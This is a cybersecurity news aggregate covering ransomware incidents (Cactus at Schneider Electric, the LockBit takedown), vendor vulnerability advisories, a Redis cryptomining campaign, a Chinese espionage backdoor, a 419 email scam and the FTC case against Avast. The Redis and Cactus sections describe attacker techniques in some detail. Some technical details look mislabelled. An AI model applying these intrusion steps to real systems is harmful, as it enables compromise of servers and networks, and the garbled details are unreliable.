In January, BleepingComputer first reported the attack that hit the Sustainability Business division of the company on January 17th. At the time, BleepingComputer contacted Schneider Electric which confirmed the data breach.
The attack impacted the services of Schneider Electric’s Resource Advisor cloud platform causing outages.
Schneider Electric said that other divisions of the company were not impacted by the cyber attack.
Today The Cactus ransomware gang published 25MB of allegedly stolen data on its Tor leak site.
The gang also published several pictures of passports and company documents as proof of the hack.
The Cactus ransomware operation has been active since March 2023, Kroll researchers reported that the ransomware strain is notable for the use of encryption to protect the ransomware binary.
Cactus ransomware uses the SoftPerfect Network Scanner (netscan) to look for other targets on the network along with PowerShell commands to enumerate endpoints. The ransomware identifies user accounts by viewing successful logins in Windows Event Viewer, it also uses a modified variant of the open-source PSnmap Tool.
The Cactus ransomware relies on multiple legitimate tools (e.g. Splashtop, AnyDesk, SuperOps RMM) to achieve remote access and uses Cobalt Strike and the proxy tool Chisel in post-exploitation activities.
Once the malware has escalated the privileges on a machine, the threat actors use a batch script to uninstall popular antivirus solutions installed on the machine.
Cactus uses the Rclone tool for data exfiltration and used a PowerShell script called TotalExec, which was used in the past by BlackBasta ransomware operators, to automate the deployment of the encryption process.
In early January, the Cactus ransomware group claimed to have hacked Coop, one of the largest retail and grocery providers in Sweden.
Law enforcement provided additional details about the international Operation Cronos that led to the disruption of the Lockbit ransomware operation.
Yesterday, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation.
Below is the image of the Tor leak site of the Lockbit ransomware gang that was seized by the UK National Crime Agency (NCA).
“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” reads the banner.
“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation. Return here for more information at: 11:30 GMT on Tuesday 20th Feb”
The Operation Cronos operation is still ongoing and NCA announced that more information have yet to be shared.
“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, Working in close cooperation with the FBI and the international law enforcement task force, Operation Cronos,” the banner reads.
“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation.”
vx-underground researchers contacted the administrators of the gang who confirmed that their infrastructure was seized by the FBI.
Lockbit ransomware group administrative staff has confirmed with us their websites have been seized. pic.twitter.com/SvpbeslrCd
The operation led to the arrest of two members of the ransomware gang in Poland and Ukraine and the seizure of hundreds of crypto wallets used by the group.
The British NCA took control of LockBit’s central administration environment used by the RaaS affiliates to carry out the cyberattacks. The authorities also seized the dark web Tor leak site used by the group.
The Tor leak site was seized by the NCA and is now used to publish updates on the law enforcement operation and provide support to the victims of the gang.
The NCA also obtained the source code of the LockBit platform and a huge trove of information on the group’s operation, including information on affiliates and supporters.
Law enforcement also had access to data stolen from the victims of the ransomware operation, a circumstance that highlights the fact that even when a ransom is paid, the ransomware gang often fails to delete the stolen information.
“LockBit had a bespoke data exfiltration tool, known as Stealbit, which was used by affiliates to steal victim data. Over the last 12 hours this infrastructure, based in three countries, has been seized by members of the Op Cronos taskforce, and 28 servers belonging to LockBit affiliates have also been taken down.” reads the NCA’s announcement. “The technical infiltration and disruption is only the beginning of a series of actions against LockBit and their affiliates. In wider action coordinated by Europol, two LockBit actors have been arrested this morning in Poland and Ukraine, over 200 cryptocurrency accounts linked to the group have been frozen.”
The US Department of Justice has charged two individuals for orchestrating ransomware attacks using the LockBit ransomware, they are currently in custody and will undergo trial in the US.
“The Justice Department also unsealed an indictment obtained in the District of New Jersey charging Russian nationals Artur Sungatov and Ivan Kondratyev, also known as Bassterlord, with deploying LockBit against numerous victims throughout the United States, including businesses nationwide in the manufacturing and other industries, as well as victims around the world in the semiconductor and other industries. Today, additional criminal charges against Kondratyev were unsealed in the Northern District of California related to his deployment in 2020 of ransomware against a victim located in California.” reads the press release published by DoJ.
“Finally, the Department also unsealed two search warrants issued in the District of New Jersey that authorized the FBI to disrupt multiple U.S.-based servers used by LockBit members in connection with the LockBit disruption.”
Additionally, the US authorities has unveiled indictments against two Russian nationals, accusing them of conspiring to carry out LockBit attacks.
The NCA and its global partners have secured over 1,000 decryption keys that will allow victims of the gang to recover their files for free. The NCA will reach out to victims based in the UK in the coming days and weeks, providing support to help them recover encrypted data.
“This NCA-led investigation is a ground-breaking disruption of the world’s most harmful cyber crime group. It shows that no criminal operation, wherever they are, and no matter how advanced, is beyond the reach of the Agency and our partners.” said National Crime Agency Director General, Graeme Biggar.
“Through our close collaboration, we have hacked the hackers; taken control of their infrastructure, seized their source code, and obtained keys that will help victims decrypt their systems.”
“As of today, LockBit are locked out. We have damaged the capability and most notably, the credibility of a group that depended on secrecy and anonymity.
“Our work does not stop here. LockBit may seek to rebuild their criminal enterprise. However, we know who they are, and how they operate. We are tenacious and we will not stop in our efforts to target this group and anyone associated with them.”
The free decryptor for the Lockbit ransomware can be downloaded from the website of the ‘No More Ransom’ initiative. It’s unclear which version of the ransomware is targeted by the decryptor.
LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.
According to a joint report published by US authorities and international peers, the total of U.S. ransoms paid to LockBit is approximately $91M since LockBit activity was first observed in the U.S. on January 5, 2020.
ConnectWise addressed two critical vulnerabilities in its ScreenConnect remote desktop access product and urges customers to install the patches asap.
ConnectWise warns of the following two critical vulnerabilities in its ScreenConnect remote desktop access product:
CWE-288 Authentication bypass using an alternate path or channel (CVSS score 10)
CWE-22 Improper limitation of a pathname to a restricted directory (“path traversal”) (CVSS score 8.4)
Both vulnerabilities were reported on February 13, 2024, through the company vulnerability disclosure channel via the ConnectWise Trust Center. The company is not aware of attacks in the wild exploiting these vulnerabilities, however, due to the higher risk of being targeted by exploits, ConnectWise recommends installing updates as emergency changes within days.
The issues impact ScreenConnect 23.9.7 and prior, below is the remediation provided in the advisory:
Cloud
There are no actions needed by the partner, ScreenConnect servers hosted in “screenconnect.com” cloud or “hostedrmm.com” have been updated to remediate the issue.
On-premise
Partners that are self-hosted or on-premise need to update their servers to version 23.9.8 immediately to apply a patch.
Researchers from Shadowserver Foundation identified roughly 28,000 internet-facing Microsoft Exchange servers vulnerable to CVE-2024-21410.
The vulnerability CVE-2024-21410 is a bypass vulnerability that can be exploited by an attacker to bypass the SmartScreen user experience and inject code to potentially gain code execution, which could lead to some data exposure, lack of system availability, or both.
“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf. For more information about Exchange Server’s support for Extended Protection for Authentication(EPA), please see Configure Windows Extended Protection in Exchange Server.” reads the advisory published by Microsoft.
Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Microsoft also updated its advisory to label the flaw as actively exploited in the wild.
On 2024-02-17 Shadowserver researchers identified around 97K vulnerable or possibly vulnerable (vulnerable version but may have mitigation applied).
Out of 97,000 servers, 28,500 have been verified to be vulnerable to CVE-2024-21410.
Most of these servers are in Germany, followed by the United States. Below are the data shared by Shadowserver:
However, the researchers warn that the above results were calculated by summing counts of unique IPs, which means that a “unique” IP may have been counted more than once.
VMware urges customers to uninstall the deprecated Enhanced Authentication Plugin (EAP) after the disclosure of a critical flaw CVE-2024-22245.
VMware is urging users to uninstall the deprecated Enhanced Authentication Plugin (EAP) after the discovery of an arbitrary authentication relay flaw CVE-2024-22245 (CVSS score: 9.6).
A threat actor could trick a domain user with EAP installed in its web browser into requesting and relaying service tickets for arbitrary Active Directory Service Principal Names (SPNs).
“Arbitrary Authentication Relay and Session Hijack vulnerabilities in the deprecated VMware Enhanced Authentication Plug-in (EAP) were responsibly reported to VMware.” reads the advisory published by the virtualization giant. “A malicious actor could trick a target domain user with EAP installed in their web browser into requesting and relaying service tickets for arbitrary Active Directory Service Principal Names (SPNs).”
According to the advisory, there are no workarounds for this vulnerability.
The VMware Enhanced Authentication Plugin (EAP) was a software plugin designed to enable seamless login to vSphere’s management interfaces through integrated Windows Authentication and Windows-based smart card functionality on Windows client systems. The plugin was deprecated in 2021 with the release of vCenter Server 7.0u2.
The company also addressed an important severity session hijack vulnerability in EAP, tracked as CVE-2024-22250 (CVSS score 7.8).
“A malicious actor with unprivileged local access to a windows operating system can hijack a privileged EAP session when initiated by a privileged domain user on the same system.” continues the advisory.
The vulnerabilities were both reported by Ceri Coburn from Pen Test Partners.
A new malware campaign targets Redis servers to deploy the mining crypto miner Migo on compromised Linux hosts.
Caro Security researchers have observed a new malware campaign targeting Redis servers with a crypto miner dubbed Migo. The campaign stands out for the use of several novel system weakening techniques against the data store itself.
Migo is a Golang ELF binary with compile-time obfuscation, it is also able to maintain persistence on Linux hosts.
The researchers also observed the malware using a new version of a popular user mode rootkit to evade detection by hiding processes and on-disk artifacts.
The researchers initially discovered that new ‘Redis system weakening commands’ have been used in attacks in the wild, and then they noticed that these commands were used in a recent malware campaign aimed at Redis systems.
One of the honeypots used by Cado was targeted by an attack originating from the IP 103[.]79[.]118[.]221 which disabled the following configuration options using the Redis command line interface’s (CLI) config set feature:
set protected-mode;
replica-read-only;
aof-rewrite-incremental-fsync;
rdb-save-incremental-fsync;
The attackers disabled these options to send additional commands to the Redis server and allow future intrusion evading defense.
“After disabling these configuration parameters, the attacker uses the set command to set the values of two separate Redis keys.” reads the report published by Cado Security. “One key is assigned a string value corresponding to a malicious attacker-controlled SSH key, and the other to a Cron job that retrieves the malicious primary payload from Transfer.sh (a relatively uncommon distribution mechanism previously covered by Cado) via Pastebin.”
The main Migo payload (/tmp/.migo) is distributed as an ELF file packed with UPX, statically linked and stripped. This ELF file can target x86_64 architecture. The sample employs standard UPX packing, preserving the UPX header, and can be easily unpacked using the command upx -d.
Upon execution, the Migo binary checks the presence of a file at /tmp/.migo_running. If this file doesn’t exist, the malicious code creates it, determines its own process ID and writes it out the file. The file is a sort of infection market for the attacker.
Then the binary downloads an XMRig installer hosted on GitHub, terminates competing miners and establishes persistence, then it launches the miner.
Below a series of actions performed by the binary:
In summary, they perform the following actions:
Make the copied version of the binary executable, to be executed via a persistence mechanism
Disable SELinux and search for uninstallation scripts for monitoring agents bundled in compute instances from cloud providers such as Qcloud and Alibaba Cloud
Execute the miner and pass the dropped configuration into it
Configure iptables to drop outbound traffic to specific IPs
Kill competing miners and payloads from similar campaigns
Register persistence via the systemd timer system-kernel.timer
Migo demonstrates the interest of threat actors in targeting cloud infrastructure for mining purposes. The attackers continue to improve their capability to exploit web-facing services.
Researchers believe that the Migo developers possess knowledge of the malware analysis process, implementing extra measures to obscure symbols and strings within the pclntab structure, thereby complicating reverse engineering.
U.S. government offers rewards of up to $15 million for information that could lead to the identification or location of LockBit ransomware gang members and affiliates.
The U.S. Department of State is offering a reward of up to $15 million for information leading to the identification or location of members of the Lockbit ransomware gang and their affiliates.
“The Department of State is announcing reward offers totaling up to $15 million for information leading to the arrest and/or conviction of any individual participating in a LockBit ransomware variant attack and for information leading to the identification and/or location of any key leaders of the LockBit ransomware group.” reads the press release published by the U.S. Department of State.
According to the press release published by the Department of State , the Lockbit ransomware operators carried out over 2,000 attacks against victims worldwide since January 2020. LockBit ransomware attacks have resulted in ransom payments exceeding $144 million for recovery.
The rewards are provided under the Transnational Organized Crime Rewards Program (TOCRP) which already targeted other ransomware operations.
The Department of State has set up a Tor website that can be used to anonymously provide information on LockBit’s operation.
Yesterday, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation.
The Operation Cronos operation is still ongoing and NCA announced that more information have yet to be shared.
The operation led to the arrest of two members of the ransomware gang in Poland and Ukraine and the seizure of hundreds of crypto wallets used by the group.
The British NCA took control of LockBit’s central administration environment used by the RaaS affiliates to carry out the cyberattacks. The authorities also seized the dark web Tor leak site used by the group.
The Tor leak site was seized by the NCA and is now used to publish updates on the law enforcement operation and provide support to the victims of the gang.
The NCA also obtained the source code of the LockBit platform and a huge trove of information on the group’s operation, including information on affiliates and supporters.
Law enforcement also had access to data stolen from the victims of the ransomware operation, a circumstance that highlights the fact that even when a ransom is paid, the ransomware gang often fails to delete the stolen information.
“LockBit had a bespoke data exfiltration tool, known as Stealbit, which was used by affiliates to steal victim data. Over the last 12 hours this infrastructure, based in three countries, has been seized by members of the Op Cronos taskforce, and 28 servers belonging to LockBit affiliates have also been taken down.” reads the NCA’s announcement. “The technical infiltration and disruption is only the beginning of a series of actions against LockBit and their affiliates. In wider action coordinated by Europol, two LockBit actors have been arrested this morning in Poland and Ukraine, over 200 cryptocurrency accounts linked to the group have been frozen.”
The US Department of Justice has charged two individuals for orchestrating ransomware attacks using the LockBit ransomware, they are currently in custody and will undergo trial in the US.
“The Justice Department also unsealed an indictment obtained in the District of New Jersey charging Russian nationals Artur Sungatov and Ivan Kondratyev, also known as Bassterlord, with deploying LockBit against numerous victims throughout the United States, including businesses nationwide in the manufacturing and other industries, as well as victims around the world in the semiconductor and other industries. Today, additional criminal charges against Kondratyev were unsealed in the Northern District of California related to his deployment in 2020 of ransomware against a victim located in California.” reads the press release published by DoJ.
“Finally, the Department also unsealed two search warrants issued in the District of New Jersey that authorized the FBI to disrupt multiple U.S.-based servers used by LockBit members in connection with the LockBit disruption.”
Additionally, the US authorities has unveiled indictments against two Russian nationals, accusing them of conspiring to carry out LockBit attacks.
The NCA and its global partners have secured over 1,000 decryption keys that will allow victims of the gang to recover their files for free. The NCA will reach out to victims based in the UK in the coming days and weeks, providing support to help them recover encrypted data.
The free decryptor for the Lockbit ransomware can be downloaded from the website of the ‘No More Ransom’ initiative. It’s unclear which version of the ransomware is targeted by the decryptor.
LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.
China-linked APT group Mustang Panda targeted various Asian countries with a variant of the PlugX (aka Korplug) backdoor dubbed DOPLUGS.
Trend Micro researchers uncovered a cyberespionage campaign, carried out by China-linked APT group Mustang Panda, targeting Asian countries, including Taiwan, Vietnam, and Malaysia.
Mustang Panda has been active since at least 2012, it targeted American and European entities such as government organizations, think tanks, NGOs, and even Catholic organizations at the Vatican. Past campaigns were focused on Asian countries, including Taiwan, Hong Kong, Mongolia, Tibet, and Myanmar. In the 2022 campaigns, threat actors used European Union reports on the conflict in Ukraine and Ukrainian government reports as lures. Upon opening the reports, the infection process starts leading to the deployment of malware on the victim’s system.
In the recent campaign, threat actors used a customized PlugX malware that includes a completed backdoor command module, the researchers named it DOPLUGS.
“This kind of customized PlugX malware has been active since 2022, with related research being published by Secureworks, Recorded Future, Check Point, and Lab52. During analysis, we observed that the piece of customized PlugX malware is dissimilar to the general type of the PlugX malware that contains a completed backdoor command module, and that the former is only used for downloading the latter.” reads the report published by Trend Micro. “Due to its different functionality, we decided to give this piece of customized PlugX malware a new name: DOPLUGS.”
The malware analysis revealed the use of the KillSomeOne module that supports USB worm capability. KillSomeOne was first disclosed by a Sophos report in November 2020.
Threat actors conducted spear-phishing attacks, using files related to current events as bait, such as the Taiwanese presidential election that took place in January 2024.
The spear-phishing emails sent by the threat actors include a Google Drive link that hosts a password-protected archive file, which will download DOPLUGS malware.
DOPLUGS acts as a downloader and supports four backdoor commands. One of the commands allows the malware to download a generic version of the PlugX malware.
The DOPLUGS samples included the KillSomeOne module and used a launcher component that executes the legitimate executable to perform DLL-sideloading. The launcher also downloads the next-stage malware from a remote server.
“Earth Preta has primarily focused on targeting government entities worldwide, particularly within the Asia-Pacific region and Europe.” concludes the report. “Based on our observations, we believe Earth Preta tends to use spear-phishing emails and Google Drive links in its attacks.”
Joomla maintainers have addressed multiple vulnerabilities in the popular content management system (CMS) that can lead to execute arbitrary code.
The maintainers of the Joomla! Project released Joomla 5.0.3 and 4.4.3 versions that addressed the following vulnerabilities in the popular content management system (CMS):
[20240201] –CVE-2024-21722 Core – Insufficient session expiration in MFA management views: The MFA management features did not properly terminate existing user sessions when a user’s MFA methods have been modified
[20240202] – CVE-2024-21723 Core – Open redirect in installation application: Inadequate parsing of URLs could result into an open redirect.
[20240203] – CVE-2024-21724 Core – XSS in media selection fields: Inadequate input validation for media selection fields lead to XSS vulnerabilities in various extensions.
[20240204] – CVE-2024-21725 Core – XSS in mail address outputs: Inadequate escaping of mail addresses lead to XSS vulnerabilities in various components.
[20240205] – CVE-2024-21726 Core – Inadequate content filtering within the filter code: Inadequate content filtering leads to XSS vulnerabilities in various components.
The impact of these flaws can be widespread because roughly 2% of all websites use Joomla, millions of websites worldwide use this CMS.
“The widespread usage of Joomla and the fact that most deployments are publicly accessible makes it a valuable target for threat actors. Just recently, Joomla was targeted in an attack against different organizations via an improper access control vulnerability (CVE-2023-23752).” reported cybersecurity firm Sonarsource which discovered an issue that led to the XSS vulnerabilities in the popular Content Management System.
The researchers pointed out that an attacker can exploit these issues to gain remote code execution by tricking an administrator into clicking on a malicious link.
“While we won’t be disclosing technical details at this time, we want to emphasize the importance of prompt action to mitigate this risk. We strongly advise all Joomla users to update to the latest version. The first release known to address the vulnerability is Joomla version 5.0.3/4.4.3.” states Sonarsource which did not disclose technical details about the issues to avoid massive exploitation in the wild.
Security researcher Salvatore Lombardo shared details about a new instance of Nigerian fraud that he called ‘Beyond the border scam.’
The 419 scam is a form of scam that requires the recipient to pay an upfront sum to receive a much larger reward later. The name derives from article 419 of the Nigerian penal code which punishes this type of fraud and is therefore also known as Nigerian fraud. The 419 scam is based on deception and psychological manipulation, exploiting the greed, pity, or curiosity of victims. Here is an example of the new Nigerian scam to which I have given the name ” Beyond the border scam ” and which is carried out entirely online and via email. In the following description, I have omitted the names mentioned, so as not to potentially involve real names that have nothing to do with the ongoing scam.
The desperate cry for help
It all begins with a desperate, very direct request for help via email from an alleged Ukrainian widow residing in a refugee camp, to receive a large sum of money bequeathed by her husband who died in the war. during the Russian invasion of Ukraine that began in 2022.
Following up on the electronic letter, the alleged widow begins a copious correspondence in which she says she was left completely alone after the death of her husband and children and without a home or money and hosted in a border refugee camp, where she feeds herself. barely and cannot afford to leave the camp, nor to operate his own bank account but only to survive miserably.
“ I am writing to you from an old desktop computer in the tent of the chaplain who works on behalf of a refugee agency, because here there is no internet point or effective means of communication. […]. I have here with me access to my late husband’s online bank account and a paper copy of his last foreign bank statement, but I can no longer access the bank account and cannot make withdrawals or transfers because the account is frozen . ”
Lavish compensation and conditions
In this dramatic scenario here is the real request: “ The bank manager, due to my refugee status, advised me to find a partner or representative anywhere in the world who will take care of me and receive the money on my behalf[ …]”, obviously for a generous fee , “ Please, I really need your kind-hearted help and I am willing to offer you a part of the money if you help me .”. Under the following conditions: “ Do you accept my proposal to offer a quarter of the money as compensation for your help? Will you make sure to help me out of my unfortunate situation, receive the money and send me some to purchase my travel documents and start a new life? Do you ensure that you do not run away with the money once it is received in your bank account? ”.
“ For security reasons ,” the email continues, “ the bank manager advised me to always remind my representative to keep this transaction confidential until the money successfully arrives in your checking account, in so as to avoid the unjustified interception of our communications with their bank by some hacker on the internet .”
Sample of the request for the mandate that the representative must sign and send to the bank for the transfer of the inheritance
Here’s the scam
But to do all this, the representative should take responsibility for sending a letter requesting the transfer of funds to the indicated bank manager, attaching a series of documents that only the lady possesses but in paper format. ” I only have the paper copy of my late husband’s last bank statement with the death certificate and I should scan them, attach them and send them to you now because it is important that you have a copy of these documents because the bank may request them, but there is no document scanning machine in our refugee camp. In order to scan, attach and send the copies, I will have to go to a center very far from our camp .”
And here is the request for money. To be able to afford the trip and pay for the document scanning service, the widow would need financial support from her representative which could be paid into an account made available by an elusive official of the usual refugee agency in service at the same tent city, justifying it by saying that “ […]Refugees are not allowed to operate a bank account because we do not have legal immigration documents here. ”
Pay attention to the typical pattern
Obviously the account does not belong to a refugee agency but to an impostor owner and any sending of money would only end up in the hands of the scammer who will ask for more money to be sent to also pay for the legal assistance necessary for issuing the authorization to the transfer of inheritance. Therefore pay attention to the typical scheme:
The scam begins with an email received from an alleged widow in difficulty asking for help in receiving the inheritance of her husband who died in the war, in exchange for a large fee;
once responded, other emails will arrive, with other information and the intermediation of a bank and refugee official;
Finally, personal details and financial support will be requested as well as all instructions to prepare the necessary documentation for the transfer of the fund, to be paid to an account of a refugee agency.
The 419 scam is very widespread and dangerous, and can cause serious economic and psychological damage to victims. To protect yourself in these cases it is important to be cautious and skeptical when receiving requests for money from strangers and even from foreign countries. Furthermore, it is best to never provide your personal or banking details and always report scam attempts and cases to the competent authorities .
For the moment the fraudulent account (probably not the only one) into which all the proceeds flow has collected approximately €1,371.00.
About the author: Salvatore Lombardo (Twitter @Slvlombardo)
Electronics engineer and Clusit member, for some time now, espousing the principle of conscious education, he has been writing for several online magazine on information security. He is also the author of the book “La Gestione della Cyber Security nella Pubblica Amministrazione”. “Education improves awareness” is his slogan.
US FTC charged cyber security firm Avast with harvesting consumer web browsing data through its browser extension and antivirus and sold it.
The US Federal Trade Commission (FTC) has filed charges against cybersecurity firm Avast, accusing it of collecting and selling consumer web browsing data gathered through its browser extension and antivirus services. The antivirus firm is accused of selling the data to advertising companies without user consent.
According to the complaint, the cybersecurity firm was advertising its products as privacy-friendly. The company claimed their software would “block[] annoying tracking cookies that collect data on your browsing activities” and “[p]rotect your privacy by preventing . . . web services from tracking your online activity.”
“Since at least 2014, Respondents have collected consumers’ browsing information through browser extensions and antivirus software installed on consumers’ computers and mobile devices.” reads the FTC’s complaint.“Respondents sold the browsing information that they purported to protect, in many instances without notice to users.”
Avast subsidiary Jumpshot sold the collected information to over 100 third parties between 2014 and 2020.
FTC will also fine Avast $16.5 million and order to stop selling or licensing any web browsing data for advertising purposes.
FTC says despite its promises to protect consumers from online tracking, Avast sold consumers' browsing data to third parties /2
Data collected by Avast could allow third parties to profile users and their habits, the cybersecurity firm could have combined this type of information with persistent identifiers that they created and that allowed identification of each consumer’s device uniquely.
Collected browsing information, including web searches and webpages visited, revealed consumers’ religious beliefs, health concerns, political leanings, location, financial status, visits to child-directed content, and interest in prurient content.
The Czech security company claimed to have anonymized the data before selling them to third parties, but FTC believes that the process did not prevent the identification of the users.
“Using a proprietary algorithm developed by Avast, Avast and Jumpshot purported to find and remove identifying information prior to each transfer of consumer browsing information to Jumpshot’s servers. But this process was not sufficient to anonymize consumers’ browsing information, which Jumpshot then sold, in non-aggregate form, through a variety of different products to third parties.” state the complaint.
Below is the statement shared by Avast in response to the FTC:
“Avast has reached a settlement with the FTC to resolve its investigation of Avast’s past provision of customer data to its Jumpshot subsidiary that Avast voluntarily closed in January of 2020. We are committed to our mission of protecting and empowering people’s digital lives. While we disagree with the FTC’s allegations and characterization of the facts, we are pleased to resolve this matter and look forward to continuing to serve our millions of customers around the world.”
Login
